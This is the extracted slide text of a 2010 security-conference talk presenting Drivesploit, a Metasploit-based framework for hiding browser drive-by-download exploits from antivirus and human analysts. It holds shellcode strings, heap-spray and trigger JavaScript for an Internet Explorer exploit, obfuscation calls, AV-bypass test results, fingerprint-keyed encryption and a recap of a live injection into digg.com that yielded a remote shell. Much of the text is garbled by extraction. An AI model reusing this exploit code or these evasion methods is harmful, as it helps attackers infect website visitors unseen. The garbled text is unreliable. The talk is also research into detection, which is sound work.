SlideShare una empresa de Scribd logo

Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection

Wayne Huang
Wayne Huang

Given at black hat and DEF CON 2010 by Wayne Huang and team. https://www.defcon.org/html/defcon-18/dc-18-speakers.html#Huang http://www.blackhat.com/html/bh-us-10/bh-us-10-briefings.html#Huang DRIVESPLOIT: CIRCUMVENTING BOTH AUTOMATED AND MANUAL DRIVE-BY-DOWNLOAD DETECTION This year saw the biggest news in Web security ever--Operation Aurora, which aimed at stealing source code and other intellectual properties and succeeded with more than 30 companies, including Google. Incidence response showed that the operation involved an IE 0-day drive-by-download, resulting in Google's compromise and leak of source code to jump points in Taiwan. The US Government is so concerned that they issued a demarche to the Chinese government. Using real, live examples, we will show how easy it is to exploit injection-based, XSS-based, and CSRF-based vulnerabilities in FaceBook, Google, Digg, LinkedIn, and other popular websites, and inject drive-by downloads. If drive-bys are so easy to inject into high-traffic websites, then the question becomes, how easy it is to make them undetectable by automated malware scanning services (such as Google's) and by human manual inspection? We will demonstrate how easy it is to defeat automated detection mechanisms and overview commonly used techniques. We will reveal for the first time, in this conference, some very advanced techniques that are almost impossible to overcome by automated analysis in the past, now, and in the future. We will release Drivesploit, a drive-by download exploit framework implemented on top of Metasploit. We will go into depth on two particular techniques supported by Drivesploit's a) javascript obfuscation based on behavior-based fingerprinting, and b) javascript timelock puzzles. We will have live demos to show how this technique easily defeats both automated AND manual detection. At the very beginning of our talk, we will be giving out a digg.com page, which we have infected with a drive-by download created with Drivesploit. Visiting this page with the right browser will trigger the exploit and download a malware that steals browser cookie files. The whole process will be undetectable by antivirus. The actual javascript drive-by code contains a secret phrase. We will give out an ipad to whomever from the audience that is able to correctly deobfuscate the javascript and give out the secret phrase. Finally, we will present case studies on systems and processes that the largest organizations have put in place in order to fight against Web-based malware. We will also present case studies of our incidence response efforts with organizations hit by Web malware injections such as Google's aurora incident. Based in Taiwan, Co-speaker Wayne has been personally involved in such incidence response efforts since the late 90's. All source codes related to POC exploits against FaceBook, Google, Digg, LinkedIn, etc, as well as source code of Drivesploit, will be released as open source at the conference. Attendees will gain the following: 1. Understanding of drive-by downloads and associated terminologies. 2. Information about various drive-by download infection vectors. 3. Appreciation of tools helpful for drive-by analysis, including Malzilla, spikermonkey, rhino, burp and wepawet 4. Realize why drive-by downloads are hard to analyze and detect. Why antivirus fail, why behavior-based approaches fail, and why even manual efforts are difficult 5. Learning the Drivesploit framework and how it can be used to develop poc drive-bys 6. Learning two new deadly techniques: behavior-based browser finterprinting and javascript timelock puzzles 7. Learning how to implement above two using Drivesploit to defeat both automated and manual drive-by analysis 8. Knowledge about the available countermeasures to this threat

TecnologíaEntretenimiento y humor
1 de 108
Descargar para leer sin conexión
掛馬免殺 DRIVESPLOIT CIRCUMVENTING AUTOMATED AND MANUAL DETECTION OF BROWSER EXPLOITS Wayne Huang, Cofounder & CTO Fyodor Yarochkin Antonio Rohman Fernandez Chris Hsiao Armorize Technologies, Inc. @waynehuang wayne@armorize.com @ i
One type of browser exploit: Drive-by Downloads defined 2
Drive-by-Download Explained • Hackers distribute malware by "poisoning" legitimate websites • Typical: injects malicious iframes into HTML content 3
Drive-by-Download Explained • Affected websites: – Essentially becomes a delivery mechanism for malware – Appear normal • Victims – Do not need to "click" or "agree to" anything – Simply connecting to the website executes the attack 4
Drive-by Download Incidents • Aurora (Google) – June 2009-Feb 2010 –TTargeted attack t d tt k – IE 0day CVE-2010-0249 – Confirmed publicly by Google, Adobe Systems, Juniper Networks and R kS d RackSpace – Total of 34 organization targeted g g
Drive-by Download Incidents • DNF666 Mass SQL Injection – Since March, 2010 –JJun: Adobe 0day CVE-2010-1297 Ad b 0d CVE 2010 1297 – Victims: Wall Street Journal, Jarusalem P t etc J l Post, t – dnf666.net, robint.us, 2677.in, 4589.in, 22d f 4589 i 22dnf.com
CNN
GameSpot
US Treasury http://thompson.blog.avg.com/2010/05/treasury‐website‐hacked.html
PlayStation.com
Washington Post
Dissecting Drive-By Downloads Page + Browser Page + Browser Exploit Payload =  Exploit Server downloader d l d 12
Dissecting Drive-By Downloads Page + Browser Page + Browser Exploit Payload =  Exploit Server downloader d l d <script>var sc = unescape(" %u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805 %uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2 %u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053 %ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8 var arr = new Array; for (var i = 0; i < sss.length; i ++ ){ arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, "" ); cc = cc.replace(/@/g, ","); eval(cc); var x1 = new Array(); for (i = 0; i <  200; i ++ ){ x1[i] = document.createElement("COMMENT"); x1[i].data = "abc"; } ; var e1 = null; function ev1(evt){  e1 = document.createEventObject(evt); document.getElementById("sp1").innerHTML = "";  window.setInterval(ev2, 50); } function ev2(){ p = "  13
Dissecting Drive-By Downloads Exploit! Page + Browser Page + Browser Exploit Payload =  Exploit Server downloader d l d <script>var sc = unescape(" %u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805 %uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2 %u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053 %ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8 var arr = new Array; for (var i = 0; i < sss.length; i ++ ){ arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, "" ); cc = cc.replace(/@/g, ","); eval(cc); var x1 = new Array(); for (i = 0; i <  200; i ++ ){ x1[i] = document.createElement("COMMENT"); x1[i].data = "abc"; } ; var e1 = null; function ev1(evt){  e1 = document.createEventObject(evt); document.getElementById("sp1").innerHTML = "";  window.setInterval(ev2, 50); } function ev2(){ p = "  14
Dissecting Drive-By Downloads Exploit! Exploits / droppers Exploits / droppers Dropper executes Exploit Server 15
Dissecting Drive-By Downloads Exploits / droppers Exploits / droppers Exploit Server Malware Malware Server 16
Dissecting Drive-By Downloads Exploits / droppers Exploits / droppers Exploit Server Malware Malware Server Controller 17
Dissecting Drive-By Downloads But who would visit? But who would visit? The key now is TRAFFIC Exploits / droppers Exploits / droppers Exploit Server Malware Malware Server Controller 18
(1) Legitimate, injectable sites URL Generators Landing Site Landing Site Exploits / droppers Exploits / droppers Exploit Server Malware Malware Server Controller 19
(1) Legitimate, injectable sites URL Generators Landing Site Landing Site  May-Ongoing:/ DNF666 mass SQ ay O go Exploits droppers 666 ass SQL g Exploits / droppers injections Exploit Server  May-June: Shared hosting compromise, Malware GoDaddy, RackSpace, GoDaddy RackSpace Network Solutions, BlueHost, DreamHost Malware Server  Continuous targeted attacks 20
(1) Legitimate, vulnerable sites URL Generators Landing Site Landing Site  Mass SQL injections Exploits / droppers Exploits / droppers  Mass hosting compromises Exploit Server  Directly inside HTML / PHP / ASP Malware  Hidden inside WorldPress files  Hidden inside DB Malware Server  Hidden inside DB stored procedures 21
(2) Man-in-the-Middle WAN LAN URL Generators Landing Site Landing Site  No tampering of website p Exploits / droppers g Exploits / droppers  LAN: ARP spoofing via ZXARPS and other Exploit Server tools Malware  WAN: March 2009, middle of route 2009 route, tw.msn.com, taiwan.cnet.com, others Malware Server Cisco advisory: http://tools.cisco.com/security/center/viewAlert.x?alertId=17778 22
LIVE DEMO 1 http://digg.com/software/ Internet_Storm_Center_ Internet_Storm_Center_ _ _ Diary_2010_02_27 23
Live demo recap
Live demo recap Injected javascript in digg.com
Live demo recap 1. Inject javascript into digg.com j j p gg 2. Javascript loads iframe from our domain zcrack.org 3. Metasploit (drivesploit) is running on zcrack.org, zcrack org serves ie peers exploit 4. Bypasses AV 5. IE visitor attacked, IE crashes, meterpreter starts, jumps process to notepad.exe notepad exe 6. We have a shell :)
MOTIVATION We provide solutions that monitors p websites and detect malicious contents 24 7 t t 24x7 We use multiple behavior-, heuristic-, p , , and signature-based technologies 27
MOTIVATION Most technologies are developed on our own, BUT, We also integrate anti-virus, whose licenses are $expensive$ 28
MOTIVATION We spend a lot of time testing our own technologies, and selecting anti-virus technologies t h l gi The key is: how good are we (and them) at detecting NEW drive-by downloads 29
MOTIVATION We need a good framework to help us g p replicate, manipulate, and mutate exploits found in the wild --into NEW derivatives 30
DRIVESPLOIT IS BORN ON TOP OF METASPLOIT 31
INITIAL FINDINGS ANTIVIRUS CAPABILITIES DIFFER GREATLY! DESKTOP AND API VERSIONS DIFFER GREATLY IN PERFORMANCE COST != PERFORMANCE
Antivirus vs. Drive-bys URL Generators Landing Site Landing Site Exploits / droppers Exploits / droppers Exploit Server Malware Malware Server Controller 33
Antivirus vs. Drive-bys JAVASCRIPT URL Generators Landing Site Landing Site JAVASCRIPT Exploits / droppers Exploits / droppers JAVASCRIPT Exploit Server Malware PE BINARY PE BINARY Malware Server Controller 34
Antivirus vs. Drive-bys JAVASCRIPT URL Generators Landing Site Landing Site JAVASCRIPT Exploits / droppers Exploits / droppers JAVASCRIPT Exploit Server Malware PE BINARY PE BINARY Malware Server We will detect  We will detect Controller 35 this part!!
Why we can’t rely on PE detection • Exploit server domains are often taken down after a few days, but the injected URL generators and the exploit servers live on – Attack reported to the hosting / registrar – Domain banned by ISPs – Purchased duration was over • We want to detect the injection so our customers can remove it • Actually statically detecting javascript exploits is Actually, quite difficult 36
THE TAO: ECMA-SCRIPTS ECMA SCRIPTS JAVASCRIPT VBSCRIPT ADOBE JS ACTIONSCRIPT 37
JAVASCRIPT!! (ECMA-SCRIPT) URL Generators Landing Site Landing Site Exploits / droppers Exploits / droppers Exploit Server Malware Malware Server Controller 38
JAVASCRIPT!! (ECMA-SCRIPT) URL Generators Landing Site Landing Site Exploits / droppers Exploits / droppers Exploit Server Malware Controller 39
JAVASCRIPT!! (ECMA-SCRIPT) URL Generators Landing Site Landing Site Exploits / droppers Exploits / droppers Exploit Server Controller 40
JAVASCRIPT!! (ECMA-SCRIPT) URL Generators Landing Site Landing Site Exploits / droppers Exploits / droppers Exploit Server (METASPLOT) Controller 41
JAVASCRIPT!! (ECMA-SCRIPT) URL Generators Landing Site Landing Site Exploits / droppers Exploits / droppers PAYLOAD Exploit Server meterpreter (METASPLOT) (memory injection) Controller 42
Drive-By wants to… • Avoid detection at the victim's desktop • Avoid detection by UTM/gateways • Avoid detection by b automated t t d monitors • Live for as long as possible ibl
Drive-By wants to… CONCLUSION: Reduce exposure: Serve SELECTIVELY Avoid detection and analysis: Mutate well
Serve Selectively HTTP LEVEL: Serve only to: • Fresh IPs (serve once per IP) set HTTP::client::onlyonce true • Particular referer (eg Gumblar) (eg. set HTTP::referer google.com • Particular agent string (vulnerable browser) set HTTP::agent::MSIE 7.0 • Black list set HTTP::client::blacklist false
SCRIPT MUTATION For exploit For F payload l d 46
The goal is not to "obfuscate"...
JAVASCRIPT EXPLOIT DISEC Shellcode M Corrupt Heapspray Trigger gg
JAVASCRIPT EXPLOIT DISEC Shellcode <script>var shellraw =  "%u7679%u4673%u757b%u924e%u 66b9%ub441%u018d%u7df9%u241 c%ud631%u40b7%ueb11%u043d%u M Corrupt be97%u212c%u05e1%u8335%u42fc %ub893%u227f%u98d4%u484b%u8 c90%u13e0%uf8d3%u7aba%u7278 %u2034%u49f5%u259f%u9137%u3 Heapspray 39b%u1dd5%ub1b0%u3f99%u2f43 %u3cb6%ub2a8%ub30c%u4714%u3 d7b%ue138%uf803%u66b2%u97b9 d7b% 138% f803% 66b2% 97b9 %u9335%u767a%ub805%ue201%u4 Trigger gg a2f%u85a8%u7eeb%uf93b%u414f% u257d%u78bf%u2c43%u7f99%ubb2 d%ub098%ub342%u918d%u3fb2%u 704a%u7147%u7f74%u3073%u77f9 %ubb40
JAVASCRIPT EXPLOIT DISEC Shellcode var j_object =  document.createElement('body'); j_object.addBehavior('#default#user M Corrupt Data'); document.appendChild(j_object); Heapspray try { for (counter=0; counter<10;  counter++) { t ){ j_object.setAttribute('s',window);} Trigger gg }  catch(e){ }window.status+= ;} catch(e){ }window status+ '';}
JAVASCRIPT EXPLOIT DISEC Shellcode var counter;var shellcode =  unescape(shellraw); var memory = new Array();var Buffer Ovf slackspace = 0x86000‐ (shellcode.length*2); var nops =  unescape("%u0c0c%u0c0c"); Heapspray while(nops.length<slackspace/2) {  nops+=nops; }var fillbl k =  } fillblock nops.substring(0,slackspace/2); Trigger gg delete nops; for(counter=0; counter<270;  counter++) {memory[counter] =  fillblock + fillblock + shellcode; + fillblock + shellcode;
JAVASCRIPT EXPLOIT DISEC Shellcode <button id j_id <button id='j id'  onclick='bootstrapper();'  style='display:none'></butt M Corrupt on> … Heapspray … … Trigger gg document.getElementById( 'j_id').onclick();
JAVASCRIPT EXPLOIT DISEC Shellcode OBFUSCATED M Corrupt BLOB  Heapspray DE‐ Trigger gg OBFUSCATOR Primitive Obfuscated Form F Form F
Dissecting Drive-By Downloads Exploit! Page + Browser Page + Browser Exploit Payload =  Exploit Server downloader d l d <script>var sc = unescape(" %u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805 %uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2 %u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053 %ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8 var arr = new Array; for (var i = 0; i < sss.length; i ++ ){ arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, "" ); cc = cc.replace(/@/g, ","); eval(cc); var x1 = new Array(); for (i = 0; i <  200; i ++ ){ x1[i] = document.createElement("COMMENT"); x1[i].data = "abc"; } ; var e1 = null; function ev1(evt){  e1 = document.createEventObject(evt); document.getElementById("sp1").innerHTML = "";  window.setInterval(ev2, 50); } function ev2(){ p = "  54
JAVASCRIPT EXPLOIT DISEC Shellcode OBFUSCATED M Corrupt BLOB  Heapspray DE‐ Start Trigger gg OBFUSCATOR Primitive Obfuscated Form F Form F
JAVASCRIPT EXPLOIT DISEC Shellcode OBFUSCATED M Corrupt BLOB  Mutate Heapspray DE‐ Start Trigger gg OBFUSCATOR Primitive Obfuscated Form F Form F
JAVASCRIPT EXPLOIT DISEC Shellcode OBFUSCATED M Corrupt BLOB  Mutate Heapspray DE‐ Start Trigger gg OBFUSCATOR Primitive Obfuscated Form F Prevent Form F
MUTATION FEATURES IMPLEMENTED SO FAR
1. Javascript Random Variable Auto Replacement • Accepts a piece of javascript p p j p • Parses the javascript according to grammer • Auto replaces all variable names and function names with random names • Passes back: a) the new javascript b) a vector of old-new name mappings ) pp g
1. Javascript Random Variable Auto Replacement randomized = Rex::Exploitation::DriveSploit::obfusca tejs(js, j (j , Rex::Exploitation::DriveSploit::AUTO_R ANDOM_VARS)
2. Javascript Concat String Obfuscation Obf ti arr = Rex::Exploitation::DriveSploit.obfusca tejs(shellcode, t j ( h ll d Rex::Exploitation::DriveSploit::STRING CONCAT) shellcode script = arr[0] h ll d i t [0] shellcode_var = arr[1]
2. Javascript Concat String Obfuscation Obf ti %u7679%u4673%u757%u924e % 7679% 4673% 757% 924 A1 = "%u7"; A3 = "u4673%"; A2 = "679%"; 679% ; A4 = "u75"; u75 ; A3 = "u4673%"; A1 = "%u7"; A4 = "u75"; u75 ; A5 = "7%u92"; 7%u92 ; A5 = "7%u92"; A2 = "679%"; A6 = "4e"; A6 = "4e";
2. Javascript Concat String Obfuscation Obf ti %u7679%u4673%u757%u924e % 7679% 4673% 757% 924 A3 = "u4673%"; A4 = "u75"; u75 ; B1 = A1+A2; A1 = "%u7"; B2 = A3+A4; ; Layer 2 ay A5 = "7%u92"; 7%u92 ; B3 = A5+A6; A2 = "679%"; A6 = "4e";
2. Javascript Concat String Obfuscation Obf ti %u7679%u4673%u757%u924e % 7679% 4673% 757% 924 B1 = A1+A2; B2 = A1+A2; B2 = A3+A4; ; B3 = A5+A6; ; B3 = A5+A6; B1 = A3+A4;
2. Javascript Concat String Obfuscation Obf ti %u7679%u4673%u757%u924e % 7679% 4673% 757% 924 A3 = "u4673%”;A4 = "u75”; " 4673%” A4 " 75” A1 = "%u7"; A5 = "7%u92”;A2 = "679%"; A6 = "4e"; B2 = A1+A2; 4e ; B1 = A3+A4;B3 = A5+A6;C1=B1+B2; D1=C1+B3; // variable names are randomized
3. Javascript Random Text Insertion insertret = Rex::Exploitation::DriveSploit.getInse rtion(shellcode, 4, 6, 10) shellcode = insertret[0] random insertion string = insertret[1]
3. Javascript Random Text Insertion insertret = Rex::Exploitation::DriveSploit.getInse rtion(shellcode, 4, 6, 10) # insert a fixed 6-character random # string, for every 4-8 characters returns a) a piece of javascript containing the injected string b) Javascript variable name containing the reverted, original string
4. Numeric Literal Mutation slackspace = p Rex::Exploitation::Drivespl oit.obfuscateNumber(0x86000 oit obfuscateNumber(0x86000 )
4. Numeric Literal Mutation slackspace = p Rex::Exploitation::Drivespl oit.obfuscateNumber(0x86000 oit obfuscateNumber(0x86000 ) ( 6 ) (56 6 96) (3 ) 8 (333 ) (246*2)+(5676*96)+(34*4)+8+(3332*1)
4. Numeric Literal Mutation slackspace = 0x86000 slackspace = l k (246*2)+(5676*96)+(34*4)+8+ (3332*1)
Trigger Prevention Shellcode OBFUSCATED M Corrupt BLOB  Heapspray DE‐ Start Trigger gg OBFUSCATOR Primitive Obfuscated Form F Prevent Form F
Trigger prevention • <div onload • <img onload • var a=1; var b=0; do { useless code; } while (a==b); (a b); • Fingerprinting-based encryption
TESTING IT OUT Using the IE peers exploit as example CVE‐2010‐0806 (MS10‐018)
PLAIN: 17/42
RANDOM VARS: 16/42 (某採!)
INJECT SC: 13/42
RANDVAR+CONCAT SC+INJECT SC 11/42
ROUGHLY 6/17 ANTI-VIRUS ANTI VIRUS DETECTS BASED ON SHELLCODE (FOR THIS EXPLOIT)
CONCAT SC+CODE: 1/42
INJECT SC+CONCAT CODE: 0/42
RANDVAR+INJECT SC+CONCAT CODE: 0/42
ANTIVIRUS DESKTOP VERSION IS MUCH STRONGER
ANTIVIRUS DESKTOP VERSION • Can monitor host environment – Hook into browsers – Easier to get raw form of exploit • Behavior analysis – Buffer overflow behavior – Download to file behavior Download-to-file
AntiVirus Desktop Kung Fu To Ag Sc Aa Ky Plain ✖ ✖ ✔ ✔ ✔ Random variables ✖ ✖ ✔ ✔ ✔ Split literals ✖ ✖ ✔ ✔ ✔ Injection SC Injection SC ✖ ✖ ✔ ✔ ✔ Concat SC ✖ ✖ ✔ ✔ ✔ Concat CODE ✖ ✔ ✖ ✔ ✔ Concat SC + Concat CODE ✖ ✖ ✖ ✔ ✔ Inject SC + Concat CODE ✖ ✖ ✖ ✖ ✔
AntiVirus Desktop Kung Fu To Ag Sc Aa Ky M Plain ✖ ✖ ✔ ✔ ✔ ✔✔ Random variables ✖ ✖ ✔ ✔ ✔ ✔✔ Split literals ✖ ✖ ✔ ✔ ✔ ✔✔ Injection SC Injection SC ✖ ✖ ✔ ✔ ✔ ✖✔ Concat SC ✖ ✖ ✔ ✔ ✔ ✖✔ Concat CODE ✖ ✔ ✖ ✔ ✔ ✖✔ Concat SC + Concat CODE ✖ ✖ ✖ ✔ ✔ ✖✔ Inject SC + Concat CODE ✖ ✖ ✖ ✖ ✔ ✖✔
LIVE DEMO 2 DESKTOP ANTIVIRUS BYPASS
5. FINGERPRINTING- BASED ENCRYPTION
Wepawet doesn’t tell much 88
89
90
91
92
Browser Feature Table IE7 FF Safari Opera Chrome Is_contextmenu_event_supported Is contextmenu event supported True True True False True String_prototype_replace_ignore_functions False False True (2.0.2) False False Is_ES5_strict_mode_supported False False False False False Array_prototype_slice_can_convert_to_array Array prototype slice can convert to array False True True True True Getelementsbytagname_returns_comment_nodes True False False False False Is_element_tagname_uppercased True True True True True Is_canvas_element_supported False True True True True Is_DOMFocusIn_supported False False True True True Is_CSS_boder_radius_supported False True True False True Function_identified_leaks_onto_enclosing_scope True False False False False Script_element_rejects_textnode_appending True False False False False Is_contextmenu_event_supported True True True False True Is_position_fixed_supported False True True False True Computed_style_return_static_positioned_element False False False True False 93
5. Fingerprinting-Based Encryption Summary • "This exploit works only for IE6" This IE6 • "Give me an encrypted version of my javascript exploit” j i t l it” • "Give me javascript to generate the decoding key" • "The key is only correctly generated if the y y yg javascript is run under IE6" 94
5. Fingerprinting-Based Encryption Summary A=Check1(); B=Check3(); C=Check4(); D Check6(); D=Check6(); E=Check8(); F=Check9(); (); G=Check12(); H=Check14(); 95
5. Fingerprinting-Based Encryption Summary A=Check1(); A=Check6(); B=Check3(); B=Check12(); C=Check4(); C=Check8(); D Check6(); D=Check6(); D Check1(); D=Check1(); E=Check8(); E=Check4(); F=Check9(); (); F=Check14(); (); G=Check12(); G=Check3(); H=Check14(); H=Check9(); 96
5. Fingerprinting-Based Encryption Summary A=Check1(); A=Check6(); One‐time key B=Check3(); B=Check12(); C=Check4(); C=Check8(); D Check6(); D=Check6(); D Check1(); D=Check1(); E=Check8(); E=Check4(); Encrypt F=Check9(); (); F=Check14(); (); javascript G=Check12(); G=Check3(); exploit l H=Check14(); H=Check9(); Generate decoding 97 javascript
Why not Anti-Virus? • AV is to install on desktops / notebooks p • Complicated normal behaviors • Strict resource constraints • Therefore, AV and gateway vendors rely on: – Signature-based pattern matching technologies – LIGHTWEIGHT and ACCURATE • Why can’t such technology used to detect drive-by-downloads? 98
Javascripts are not harmful to th t the environment… i t 99
… so they are usually not reused AV no good because drive-by-downloads are in: g y • Disposable Javascript • Disposable PDF Adobe JS • Disposable Flash actionscript • All ECMA- scripts you don't usually reuse them… 100
Javascript Packing Is a Norm • Packing is widely used by legitimate code! – To protect javascript source code – To reduce javascript size • Google Closure Compiler – http //code google com/clos e/compile / http://code.google.com/closure/compiler/ • Yahoo Javascript Packer (YUI Compressor) – http://developer.yahoo.com/yui/compressor/ p // p y /y / p / • Advanced HTML Protector – http://www.creabit.com/htmlprotect/ • D Dean Edwards’ Packer Ed d ’P k – http://dean.edwards.name/packer/ • Online JS Obfuscator – http://www.iwebtool.com/html_encrypter • http://www.cha88.cn/safe/fromCharCode.php 101
… OK so AV doesn t work (that well)… doesn’t well) How about behavior-based approaches? 102
Defeating Behavior Analysis 1. Use VBScript – Exploits in VBScript – URL generators in VBScript – Exploits in / generated by VBScript – May defeat SpiderMonkey et al (Rhino, JSunPack, etc) 2. Don’t serve to detectors – You can’t detect what you don’t have – Serve to each IP only once – Detect agent strings – Collect robot IPs—Google, Yahoo, security vendors 103
Defeating Behavior Analysis 3. Fingerprint-based encryption g p yp 3. Little b effective techniques l but ff h – Sleep(30000); //using SetTimeout – Timelock puzzles 104
Future Work • Randomly chop up scripts and split into individual f l d d l files • Generating VBscript instead of javascript g p j p • Encrypting using data existing outside of HTML – HTTP headers
Discussion • The Panopticlick experiment by p p y Eckersley of EFF – 94.2% of "typical desktop browsers” are unique yp p q • Can fingerprinting-based encryption be integrated with this type of individual fingerprinting, to prevent detection and analysis of target attacks?
THANK YOU! wayne@armorize.com @waynehuang @drivesploit http://www.drivesploit.org http://www drivesploit org Credits: wayne huang, fyodor yarochkin, g antonio rohman fernandez Special thanks to: Benson Wu, Jeremy Chiu, Kuon Ding Felix, Cola Ding, Felix
References • James Lee, Using guided missles in drive-bys http://www.slideshare.net/egypt/using guided missiles in http://www slideshare net/egypt/using-guided-missiles-in- drivebys-automatic-browser-fingerprinting-and-exploitation-with- the-metasploit-frameworks-browser-autopwn • Sebastian Porst, How to really obfuscate your , y y PDF malware http://www.slideshare.net/cblichmann/how- to-really-obfuscate-your-pdf-malware • Jeremy Chiu, 0box analyzer: afterdark runtime forensics for automated malware analysis and clustering http://www.slideshare.net/wayne_armorize/0-box-analyzer- afterdark-runtime-forensics-for-automated-malware-analysis-and- ft d k ti f i f t t d l l i d clustering-2 • HeapLib support added to Metasploit 3 http://blog.metasploit.com/2007/04/heaplib-support-added-to- http://blog metasploit com/2007/04/heaplib support added to metasploit-3.html

Recomendados

Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Jeremiah Grossman
 
Sandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorageSandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStoragetomasperezv
 
Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Jeremiah Grossman
 
Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)Jeremiah Grossman
 
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac DawsonCODE BLUE
 
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés RianchoCODE BLUE
 
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsI'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsKrzysztof Kotowicz
 
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveGreenD0g
 

Recomendados

Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Jeremiah Grossman
 
Sandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorageSandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStoragetomasperezv
 
Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Jeremiah Grossman
 
Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)Jeremiah Grossman
 
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac DawsonCODE BLUE
 
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés RianchoCODE BLUE
 
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsI'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsKrzysztof Kotowicz
 
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveGreenD0g
 
Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5DefconRussia
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesMichele Orru
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application HackingRaghav Bisht
 
Html5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraHtml5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraKrzysztof Kotowicz
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...CODE BLUE
 
